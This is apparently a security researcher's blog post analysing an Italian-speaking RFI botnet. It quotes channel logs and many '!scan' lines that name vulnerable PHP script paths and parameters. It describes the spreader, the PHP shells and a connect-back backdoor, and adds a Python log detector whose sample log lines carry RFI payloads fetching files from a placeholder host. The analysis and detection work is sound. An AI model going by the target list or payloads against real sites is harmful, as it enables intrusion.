Inside an RFI Botnet
by Jose Nazario

It all began innocently enough: I have been analyzing Apache logs for a while now, and when I spotted an RFI bot named “ddos.txt”, you know I had to look. After downloading and analyzing it, I joined the channel with a copy of Bladerunner and started watching. The net has been pretty quiet, but here are a few messages that came across lately:
Tue Nov 11 00:11:14 2008 @scan index.php?rage= index.php?rage=
...
Thu Nov 13 07:12:37 2008 !scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
Thu Nov 13 07:12:37 2008 !scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
Thu Nov 13 07:12:37 2008 !scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
Thu Nov 13 07:12:37 2008 !scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
Thu Nov 13 07:12:37 2008 !scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
Thu Nov 13 07:12:37 2008 !scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
Thu Nov 13 07:12:37 2008 !scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
Thu Nov 13 07:12:40 2008 !scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
Thu Nov 13 07:12:41 2008 !scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
Thu Nov 13 07:12:43 2008 !scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
...
Fri Nov 14 12:27:15 2008 4,12Ciao a tutti
Fri Nov 14 12:27:17 2008 4,12Arrivederci alla prox
...
Mon Nov 17 16:35:05 2008 hello
Mon Nov 17 18:54:45 2008 hello
Looks like Italian-speaking hackers simply growing a botnet. No DDoS attacks have been launched so far.
The channel topic instructs members (i.e. the bots) to download three files. The first is one we’ll call “dork”. It is basically a config file for an RFI scanner written in Perl: a massive file (over 4300 scan commands) used to spread the botnet. There is simply no shortage of RFI vulnerabilities out there in various projects.
!scan /tellmatic/include/libchart-1.1/libchart.php?tm_includepath= "Tellmatic 1.0.7.1" "Tellmatic 1.0.7.1"
!scan esupport/admin/autoclose.php?subd= "Powered By Kayako eSupport" "Powered By Kayako eSupport"
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE" asia "PHP-NUKE" asia
!scan /index.php?skin_file= "powered by Mp3 ToolBox 1.0 beta 5" "powered by Mp3 ToolBox 1.0 beta 5"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" cz "zeroboard" cz
!scan /config.inc.php?path_escape= "XZero"
!scan mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" de "/mambots/content/" de
!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License"
!scan /tools/send_reminders.php?noSet=0&includedir= WebCalendar
!scan phprojekt/lib/lib.inc.php?path_pre= /phprojekt/
!scan phprojekt/lib/lib.inc.php?path_pre= copyright ©2000-2005 Albrecht Guenther
...
The other two URLs point to c57 and c99 PHP shells.
These all work together with a Perl script we’ll call “dork.pl”. Basically it works like this:
- Use search engines to find vulnerable systems: Google, AllTheWeb, GigaBlast, AOL, Yahoo, MSN, ASK, FireBall
- Try to exploit the box:
  - First try a PHP ID script; if that works, move on and mail the author that it worked
  - Next try to load a PHP shell on the box; if that works, mail and move on to the next step
  - Now try to get the first-stage “spreader” on the box; again, mail and move on if successful
  - Finally try to get the second-stage “spreader” on the box; mail if successful
- Once the box is exploited, all of the scripts are on it: a PHP bot, a Perl bot (which is also an IRC bot, DDoS tool, and exploiter), and PHP shells.
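The “!scan” lines above give away exactly which script paths and parameters the spreader will hit, so a defender can turn the dork list into a detector for the Apache logs the post started from. The following Python is an added example (not code from the post or from the botnet): it parses a few constructed “!scan” lines into (path, parameter) pairs, then flags access-log requests (also constructed; IPs are documentation-range placeholders) whose parameter value is a remote URL, which is the signature of an RFI attempt; hits on parameters not in the dork list are reported too, marked as unknown.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed sample in the "!scan <path>?<param>= <search dork>..." format.
DORK_LINES = """
!scan /tellmatic/include/libchart-1.1/libchart.php?tm_includepath= "Tellmatic 1.0.7.1"
!scan esupport/admin/autoclose.php?subd= "Powered By Kayako eSupport"
!scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
"""

# Constructed Apache combined-log lines; 203.0.113.x / 198.51.100.x are placeholders.
ACCESS_LOG = """
203.0.113.5 - - [13/Nov/2008:07:14:02 +0000] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://198.51.100.7/ddos.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Nov/2008:07:15:11 +0000] "GET /esupport/admin/autoclose.php?subd=cases HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Nov/2008:07:16:40 +0000] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=ftp://198.51.100.7/c99.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
"""

REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def parse_dorks(text):
    """Return the set of (path, injectable_param) pairs from '!scan' lines."""
    targets = set()
    for line in text.strip().splitlines():
        m = re.match(r"!scan\s+(\S+)", line)
        if not m:
            continue
        url = urlparse(m.group(1))
        path = "/" + url.path.lstrip("/")          # dork file mixes relative and absolute paths
        pairs = parse_qsl(url.query, keep_blank_values=True)
        if pairs:
            targets.add((path, pairs[-1][0]))     # the trailing empty "param=" is the injection point
    return targets


def find_rfi_attempts(log_text, targets):
    """Return (ip, path, param, remote_url, known_dork) for every request that
    feeds a remote URL into a query parameter."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request = m.groups()
        url = urlparse(request)
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append((ip, url.path, param, value, (url.path, param) in targets))
    return hits
```

The trailing “?” in the first hit is the usual trick to neutralise whatever the vulnerable include appends, so it is worth keeping in the report rather than stripping.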
Quite the sloppy setup, very much slapped together. The code could use a good refactoring as well; it has a lot of cut-and-paste going on. Crude but effective.
Once the PHP bot, in this case “ddos.txt”, is dropped and executed via the RFI exploit, it drops another Perl script on the box; this one is a connect-back backdoor. Its payload is Base64-encoded inside the PHP, so the bot simply opens a file in /tmp and writes the decoded script there.
In this case the bots connect to IndoIRC and possibly irc.irchighway.net; neither network is terribly well known for its security practices, and both seem to tolerate or welcome botnet activity.
The great proliferation of RFI attacks, and the ease with which they can be tested and exploited with “frameworks” such as “dork.pl”, should give you great pause. We often see phishing sites set up on these boxes, and sometimes other nefarious activities hosted there as well. When folks have hundreds of vulnerabilities and thousands of boxes to easily test them against, they’ll strike it rich quickly. Death by a thousand cuts, and now you can see how it happens.
[...] Nazario of Arbor Networks wrote a vivid report on an RFI botnet he investigated. No new insights, but a good and [...]